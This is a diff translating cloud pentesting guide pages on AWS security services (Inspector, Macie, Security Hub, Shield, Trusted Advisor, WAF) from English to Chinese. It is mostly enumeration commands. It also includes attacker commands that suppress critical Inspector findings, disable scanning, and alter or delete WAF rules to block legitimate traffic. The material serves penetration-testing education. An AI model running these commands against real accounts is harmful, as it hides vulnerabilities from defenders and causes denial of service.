+攻击者可能会操纵AWS Inspector资源上的标签,这些标签对于组织、跟踪和自动化安全评估至关重要。通过更改或删除标签,攻击者可能会潜在地隐藏安全扫描中的漏洞,干扰合规性报告,并干扰自动修复过程,从而导致未检查的安全问题和系统完整性受损。 ```bash aws inspector2 tag-resource --resource-arn --tags aws inspector2 untag-resource --resource-arn --tag-keys ``` +- **潜在影响**:隐藏漏洞、干扰合规报告、干扰安全自动化和干扰成本分配。 -- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. 
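As a wrap-up, the following hedged sketch chains two of the primitives above to blind the victim's Inspector coverage. The account ID, filter name and filter criteria are illustrative only:

```bash
# Hide every CRITICAL finding behind a suppression rule
aws inspector2 create-filter --name "maintenance-window" --action SUPPRESS \
  --filter-criteria '{"severity":[{"comparison":"EQUALS","value":"CRITICAL"}]}' \
  --reason "temporary maintenance"

# Stop generating new container/serverless findings altogether (delegated admin required)
aws inspector2 disable --account-ids 123456789012 --resource-types ECR LAMBDA
```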
- -## References +## 参考文献 - [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md index e6e3a2281..fac6944df 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -6,70 +6,69 @@ ## Macie -Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. +Amazon Macie 是一项旨在 **自动检测、分类和识别数据** 的服务,适用于 AWS 账户。它利用 **机器学习** 持续监控和分析数据,主要集中在通过检查 **cloud trail event** 数据和用户行为模式来检测和警报异常或可疑活动。 -Key Features of Amazon Macie: +Amazon Macie 的主要特点: -1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. -2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. -3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. -4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. -5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. +1. **主动数据审查**:利用机器学习在 AWS 账户内各种操作发生时主动审查数据。 +2. **异常检测**:识别不规则活动或访问模式,生成警报以减轻潜在的数据暴露风险。 +3. **持续监控**:自动监控和检测 Amazon S3 中的新数据,利用机器学习和人工智能随着时间的推移适应数据访问模式。 +4. **使用 NLP 进行数据分类**:利用自然语言处理 (NLP) 对不同数据类型进行分类和解释,分配风险评分以优先处理发现。 +5. **安全监控**:识别安全敏感数据,包括 API 密钥、秘密密钥和个人信息,帮助防止数据泄露。 -Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. +Amazon Macie 是一项 **区域服务**,需要 'AWSMacieServiceCustomerSetupRole' IAM 角色和启用的 AWS CloudTrail 才能正常工作。 ### Alert System -Macie categorizes alerts into predefined categories like: +Macie 将警报分类为预定义类别,如: -- Anonymized access -- Data compliance -- Credential Loss -- Privilege escalation -- Ransomware -- Suspicious access, etc. +- 匿名访问 +- 数据合规 +- 凭证丢失 +- 权限提升 +- 勒索软件 +- 可疑访问等。 -These alerts provide detailed descriptions and result breakdowns for effective response and resolution. +这些警报提供详细描述和结果细分,以便有效响应和解决。 ### Dashboard Features -The dashboard categorizes data into various sections, including: +仪表板将数据分类为多个部分,包括: -- S3 Objects (by time range, ACL, PII) -- High-risk CloudTrail events/users -- Activity Locations -- CloudTrail user identity types, and more. 
+- S3 对象(按时间范围、ACL、PII) +- 高风险 CloudTrail 事件/用户 +- 活动位置 +- CloudTrail 用户身份类型等。 ### User Categorization -Users are classified into tiers based on the risk level of their API calls: +用户根据其 API 调用的风险级别被分类为不同层级: -- **Platinum**: High-risk API calls, often with admin privileges. -- **Gold**: Infrastructure-related API calls. -- **Silver**: Medium-risk API calls. -- **Bronze**: Low-risk API calls. +- **Platinum**:高风险 API 调用,通常具有管理员权限。 +- **Gold**:与基础设施相关的 API 调用。 +- **Silver**:中风险 API 调用。 +- **Bronze**:低风险 API 调用。 ### Identity Types -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. +身份类型包括 Root、IAM 用户、假定角色、联合用户、AWS 账户和 AWS 服务,指示请求的来源。 ### Data Classification -Data classification encompasses: +数据分类包括: -- Content-Type: Based on detected content type. -- File Extension: Based on file extension. -- Theme: Categorized by keywords within files. -- Regex: Categorized based on specific regex patterns. +- Content-Type:基于检测到的内容类型。 +- File Extension:基于文件扩展名。 +- Theme:根据文件中的关键词分类。 +- Regex:基于特定的正则表达式模式分类。 -The highest risk among these categories determines the file's final risk level. +这些类别中最高的风险决定文件的最终风险级别。 ### Research and Analysis -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. +Amazon Macie 的研究功能允许对所有 Macie 数据进行自定义查询以进行深入分析。过滤器包括 CloudTrail 数据、S3 存储桶属性和 S3 对象。此外,它支持邀请其他账户共享 Amazon Macie,促进协作数据管理和安全监控。 ### Enumeration - ``` # Get buckets aws macie2 describe-buckets @@ -102,21 +101,16 @@ aws macie2 list-classification-jobs aws macie2 list-classification-scopes aws macie2 list-custom-data-identifiers ``` - -#### Post Exploitation +#### 后期利用 > [!TIP] -> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. +> 从攻击者的角度来看,这项服务并不是为了检测攻击者,而是为了检测存储文件中的敏感信息。因此,这项服务可能**帮助攻击者在存储桶中找到敏感信息**。\ +> 然而,攻击者也可能对破坏它感兴趣,以防止受害者收到警报,从而更容易窃取该信息。 TODO: PRs are welcome! -## References +## 参考文献 - [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md index 36dc8fbe9..766983494 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md @@ -4,24 +4,21 @@ ## Security Hub -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. 
+**Security Hub** 收集来自 **AWS 账户**、服务和支持的第三方合作伙伴产品的安全 **数据**,并帮助您 **分析您的安全** 趋势并识别最高优先级的安全问题。 -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts +它 **集中管理跨账户的安全相关警报**,并提供一个用户界面来查看这些警报。最大的限制是它 **不集中管理跨区域的警报**,仅限于跨账户。 -**Characteristics** - -- Regional (findings don't cross regions) -- Multi-account support -- Findings from: - - Guard Duty - - Config - - Inspector - - Macie - - third party - - self-generated against CIS standards - -## Enumeration +**特点** +- 区域性(发现不跨区域) +- 多账户支持 +- 来自以下的发现: +- Guard Duty +- Config +- Inspector +- Macie +- 第三方 +- 根据 CIS 标准自生成的 ``` # Get basic info aws securityhub describe-hub @@ -50,18 +47,13 @@ aws securityhub list-automation-rules aws securityhub list-members aws securityhub get-members --account-ids ``` - -## Bypass Detection +## 绕过检测 TODO, PRs accepted -## References +## 参考文献 - [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) - [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md index b1df3003b..da5f612ed 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md @@ -4,16 +4,12 @@ ## Shield -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. +AWS Shield 旨在帮助 **保护您的基础设施免受分布式拒绝服务攻击**,通常称为 DDoS。 -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. +**AWS Shield Standard** 对所有人 **免费**,并提供 **DDoS 保护**,针对一些更常见的第三层,**网络层**,和第四层,**传输层**,DDoS 攻击。此保护与 CloudFront 和 Route 53 集成。 -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. 
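To check whether Standard or Advanced is in place and which resources are protected, a few read-only Shield calls can help. A hedged sketch: most of these only return data when Shield Advanced is subscribed, and since the Shield API is global it may be necessary to call it with `--region us-east-1`:

```bash
# ACTIVE/INACTIVE for Shield Advanced in this account
aws shield get-subscription-state
# Advanced-only details (subscription, protected resources, DRT access, past attacks)
aws shield describe-subscription
aws shield list-protections
aws shield describe-drt-access
aws shield list-attacks
```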
+**AWS Shield Advanced** 提供更 **高水平的保护**,针对更广泛的 AWS 服务的 DDoS 攻击,需额外付费。此高级级别提供对运行在 EC2、CloudFront、ELB 和 Route 53 上的 Web 应用程序的保护。除了这些额外的资源类型受到保护外,与 Standard 相比,还提供增强级别的 DDoS 保护。您还将 **获得 AWS 的 24 小时专门 DDoS 响应团队,称为 DRT**。 -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** +而 Standard 版本的 Shield 提供对第三层和第四层的保护,**Advanced 还提供对第七层,应用程序攻击的保护。** {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index a975d7476..f817ddeba 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -4,72 +4,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS Trusted Advisor Overview +## AWS Trusted Advisor 概述 -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: +Trusted Advisor 是一项 **提供建议** 的服务,旨在优化您的 AWS 账户,符合 **AWS 最佳实践**。这是一项跨多个区域运行的服务。Trusted Advisor 在四个主要类别中提供见解: -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. +1. **成本优化:** 建议如何重组资源以减少开支。 +2. **性能:** 识别潜在的性能瓶颈。 +3. **安全:** 扫描漏洞或弱安全配置。 +4. **容错:** 推荐增强服务弹性和容错的实践。 -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. +Trusted Advisor 的全面功能仅在 **AWS 商业或企业支持计划** 下可用。没有这些计划,访问限制为 **六项核心检查**,主要集中在性能和安全上。 -### Notifications and Data Refresh +### 通知和数据刷新 -- Trusted Advisor can issue alerts. -- Items can be excluded from its checks. -- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. +- Trusted Advisor 可以发出警报。 +- 项目可以从其检查中排除。 +- 数据每 24 小时刷新一次。然而,在上次刷新后 5 分钟可以手动刷新。 -### **Checks Breakdown** +### **检查细分** -#### CategoriesCore +#### 类别核心 -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions +1. 成本优化 +2. 安全 +3. 容错 +4. 性能 +5. 服务限制 +6. S3 存储桶权限 -#### Core Checks +#### 核心检查 -Limited to users without business or enterprise support plans: +限于没有商业或企业支持计划的用户: -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. Service Limits +1. 安全组 - 特定端口不受限制 +2. IAM 使用 +3. 根账户上的 MFA +4. EBS 公共快照 +5. RDS 公共快照 +6. 
服务限制 -#### Security Checks +#### 安全检查 -A list of checks primarily focusing on identifying and rectifying security threats: +主要集中在识别和纠正安全威胁的检查列表: -- Security group settings for high-risk ports -- Security group unrestricted access -- Open write/list access to S3 buckets -- MFA enabled on root account -- RDS security group permissiveness -- CloudTrail usage -- SPF records for Route 53 MX records -- HTTPS configuration on ELBs -- Security groups for ELBs -- Certificate checks for CloudFront -- IAM access key rotation (90 days) -- Exposure of access keys (e.g., on GitHub) -- Public visibility of EBS or RDS snapshots -- Weak or absent IAM password policies +- 高风险端口的安全组设置 +- 安全组不受限制的访问 +- 对 S3 存储桶的开放写/列访问 +- 根账户上启用 MFA +- RDS 安全组的宽松性 +- CloudTrail 使用 +- Route 53 MX 记录的 SPF 记录 +- ELB 上的 HTTPS 配置 +- ELB 的安全组 +- CloudFront 的证书检查 +- IAM 访问密钥轮换(90 天) +- 访问密钥的暴露(例如,在 GitHub 上) +- EBS 或 RDS 快照的公共可见性 +- 弱或缺失的 IAM 密码策略 -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. +AWS Trusted Advisor 作为确保 AWS 服务的优化、性能、安全和容错的重要工具,基于既定的最佳实践。 -## **References** +## **参考文献** - [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 661b836d5..095dea8a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -6,103 +6,102 @@ ## AWS WAF -AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. +AWS WAF 是一个 **Web 应用防火墙**,旨在 **保护 Web 应用程序或 API** 免受各种可能影响其可用性、安全性或资源消耗的 Web 攻击。它使用户能够通过设置 **安全规则** 来控制传入流量,从而减轻 SQL 注入或跨站脚本等典型攻击向量的影响,并通过定义自定义过滤规则。 -### Key concepts +### 关键概念 -#### Web ACL (Access Control List) +#### Web ACL(访问控制列表) -A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions. +Web ACL 是一组规则的集合,您可以将其应用于您的 Web 应用程序或 API。当您将 Web ACL 与资源关联时,AWS WAF 根据 Web ACL 中定义的规则检查传入请求并采取指定的操作。 -#### Rule Group +#### 规则组 -A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs. +规则组是可重用的规则集合,您可以将其应用于多个 Web ACL。规则组有助于在不同的 Web 应用程序或 API 之间管理和维护一致的规则集。 -Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it. 
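Related to capacity: the web ACL capacity units (WCUs) that a candidate set of rules would consume can be estimated before the rule group is created. A hedged sketch, where the rules file follows the same format as the rule.json examples shown later in this page:

```bash
# Returns the WCUs required to run the given rules
aws wafv2 check-capacity --scope REGIONAL --region eu-south-2 --rules file://rules.json
```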
+每个规则组都有其相关的 **容量**,这有助于计算和控制用于运行您的规则、规则组和 Web ACL 的操作资源。一旦在创建时设置了其值,就无法修改。 -#### Rule +#### 规则 -A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules: +规则定义了一组 AWS WAF 用于检查传入 Web 请求的条件。主要有两种类型的规则: -1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests. -2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. +1. **常规规则**:此规则类型使用指定的条件来确定是否允许、阻止或计数 Web 请求。 +2. **基于速率的规则**:在五分钟内计算来自特定 IP 地址的请求。在这里,用户定义一个阈值,如果来自某个 IP 的请求数量在五分钟内超过此限制,则该 IP 的后续请求将被阻止,直到请求速率降至阈值以下。基于速率的规则的最小阈值为 **2000 个请求**。 -#### Managed Rules +#### 管理规则 -AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities. +AWS WAF 提供由 AWS 和 AWS Marketplace 卖家维护的预配置管理规则集。这些规则集提供对常见威胁的保护,并定期更新以应对新漏洞。 -#### IP Set +#### IP 集 -An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules. +IP 集是您希望允许或阻止的 IP 地址或 IP 地址范围的列表。IP 集简化了管理基于 IP 的规则的过程。 -#### Regex Pattern Set +#### 正则表达式模式集 -A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters. +正则表达式模式集包含一个或多个正则表达式(regex),用于定义在 Web 请求中搜索的模式。这对于更复杂的匹配场景非常有用,例如过滤特定字符序列。 -#### Lock Token +#### 锁定令牌 -A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. +锁定令牌用于在更新 WAF 资源时进行并发控制。它确保更改不会被多个用户或进程同时尝试更新同一资源而意外覆盖。 -#### API Keys +#### API 密钥 -API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. +AWS WAF 中的 API 密钥用于对某些 API 操作的请求进行身份验证。这些密钥经过加密并安全管理,以控制访问并确保只有授权用户可以更改 WAF 配置。 -- **Example**: Integration of the CAPTCHA API. +- **示例**:CAPTCHA API 的集成。 -#### Permission Policy +#### 权限策略 -A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations. +权限策略是一个 IAM 策略,指定谁可以对 AWS WAF 资源执行操作。通过定义权限,您可以控制对 WAF 资源的访问,并确保只有授权用户可以创建、更新或删除配置。 -#### Scope +#### 范围 -The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. +AWS WAF 中的范围参数指定 WAF 规则和配置是否适用于区域应用程序或 Amazon CloudFront 分发。 -- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. -- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. 
WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. +- **REGIONAL**:适用于区域服务,如应用程序负载均衡器(ALB)、Amazon API Gateway REST API、AWS AppSync GraphQL API、Amazon Cognito 用户池、AWS App Runner 服务和 AWS Verified Access 实例。您指定这些资源所在的 AWS 区域。 +- **CLOUDFRONT**:适用于 Amazon CloudFront 分发,这些分发是全球性的。CloudFront 的 WAF 配置通过 `us-east-1` 区域进行管理,无论内容在哪里提供。 -### Key features +### 关键特性 -#### Monitoring Criteria (Conditions) +#### 监控标准(条件) -**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**. +**条件** 指定 AWS WAF 监控的传入 HTTP/HTTPS 请求的元素,包括 XSS、地理位置(GEO)、IP 地址、大小限制、SQL 注入和模式(字符串和正则表达式匹配)。需要注意的是,**基于国家在 CloudFront 级别限制的请求不会到达 WAF**。 -Each AWS account can configure: +每个 AWS 账户可以配置: -- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). -- **100 rules** and **50 Web ACLs**. -- A maximum of **5 rate-based rules**. -- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. +- 每种类型 **100 个条件**(正则表达式除外,正则表达式仅允许 **10 个条件**,但此限制可以增加)。 +- **100 条规则** 和 **50 个 Web ACL**。 +- 最多 **5 条基于速率的规则**。 +- 当 WAF 与应用程序负载均衡器一起实施时,吞吐量为 **每秒 10,000 个请求**。 -#### Rule actions +#### 规则操作 -Actions are assigned to each rule, with options being: +每条规则分配操作,选项包括: -- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. -- **Block**: The request is terminated immediately. -- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. +- **允许**:请求被转发到适当的 CloudFront 分发或应用程序负载均衡器。 +- **阻止**:请求立即终止。 +- **计数**:统计符合规则条件的请求。这对于规则测试非常有用,可以在将其设置为允许或阻止之前确认规则的准确性。 +- **CAPTCHA 和挑战**:通过 CAPTCHA 谜题和静默挑战验证请求是否来自机器人。 -If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: +如果请求与 Web ACL 中的任何规则不匹配,则会执行 **默认操作**(允许或阻止)。规则执行的顺序在 Web ACL 中定义,至关重要,通常遵循以下顺序: -1. Allow Whitelisted IPs. -2. Block Blacklisted IPs. -3. Block requests matching any detrimental signatures. +1. 允许白名单 IP。 +2. 阻止黑名单 IP。 +3. 阻止匹配任何有害签名的请求。 -#### CloudWatch Integration +#### CloudWatch 集成 -AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks. +AWS WAF 与 CloudWatch 集成以进行监控,提供如 AllowedRequests、BlockedRequests、CountedRequests 和 PassedRequests 等指标。这些指标默认每分钟报告,并保留两周的时间。 -### Enumeration +### 枚举 -In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): +为了与 CloudFront 分发进行交互,您必须指定区域 US East(N. Virginia): -- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . -- API and SDKs - For all calls, use the Region endpoint us-east-1. 
+- CLI - 在使用 CloudFront 范围时指定区域 US East:`--scope CLOUDFRONT --region=us-east-1`。 +- API 和 SDK - 对于所有调用,使用区域端点 us-east-1。 -In order to interact with regional services, you should specify the region: - -- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` +为了与区域服务进行交互,您应指定区域: +- 以区域欧洲(西班牙)为例:`--scope REGIONAL --region=eu-south-2` ```bash # Web ACLs # @@ -146,7 +145,7 @@ aws wafv2 list-ip-sets --scope | CLOUDFRONT --region= aws wafv2 get-ip-set --name --id --scope | CLOUDFRONT --region=us-east-1> ## Retrieve the keys that are currently being managed by a rate-based rule. aws wafv2 get-rate-based-statement-managed-keys --scope | CLOUDFRONT --region=us-east-1>\ - --web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] +--web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] # Regex pattern sets # @@ -186,78 +185,70 @@ aws wafv2 list-mobile-sdk-releases --platform aws wafv2 get-mobile-sdk-release --platform --release-version ``` - ### Post Exploitation / Bypass > [!TIP] -> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. +> 从攻击者的角度来看,这项服务可以帮助攻击者识别 WAF 保护和网络暴露,这可能帮助他攻陷其他网站。 > -> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. +> 然而,攻击者也可能对破坏这项服务感兴趣,以便网站不受 WAF 保护。 -In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. +在许多删除和更新操作中,提供 **lock token** 是必要的。此令牌用于对资源进行并发控制,确保更改不会被多个用户或进程同时尝试更新同一资源而意外覆盖。为了获得此令牌,您可以对特定资源执行相应的 **list** 或 **get** 操作。 #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`** -An attacker would be able to compromise the security of the affected resource by: - -- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. -- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. -- Deleting rule groups that provide critical security measures. 
+攻击者将能够通过以下方式危害受影响资源的安全性: +- 创建规则组,例如,可以阻止来自合法 IP 地址的合法流量,从而导致服务拒绝。 +- 更新规则组,能够修改其操作,例如从 **Block** 更改为 **Allow**。 +- 删除提供关键安全措施的规则组。 ```bash # Create Rule Group aws wafv2 create-rule-group --name --capacity --visibility-config \ --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Update Rule Group aws wafv2 update-rule-group --name --id --visibility-config --lock-token \ - --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Delete Rule Group aws wafv2 delete-rule-group --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following examples shows a rule group that would block legitimate traffic from specific IP addresses: - +以下示例显示了一个规则组,该规则组将阻止来自特定IP地址的合法流量: ```bash aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json ``` - -The **rule.json** file would look like: - +该 **rule.json** 文件看起来像: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPsRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPsRule" +} +} ] ``` - -**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. +**潜在影响**:未经授权的访问、数据泄露和潜在的拒绝服务攻击。 #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`** -With these permissions, an attacker would be able to: +拥有这些权限,攻击者将能够: -- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. -- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. -- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. +- 创建一个新的 Web ACL,引入允许恶意流量通过或阻止合法流量的规则,从而使 WAF 无效或导致拒绝服务。 +- 更新现有的 Web ACL,能够修改规则以允许之前被阻止的攻击,例如 SQL 注入或跨站脚本,或通过阻止有效请求来干扰正常流量。 +- 删除一个 Web ACL,使受影响的资源完全不受保护,暴露于广泛的网络攻击中。 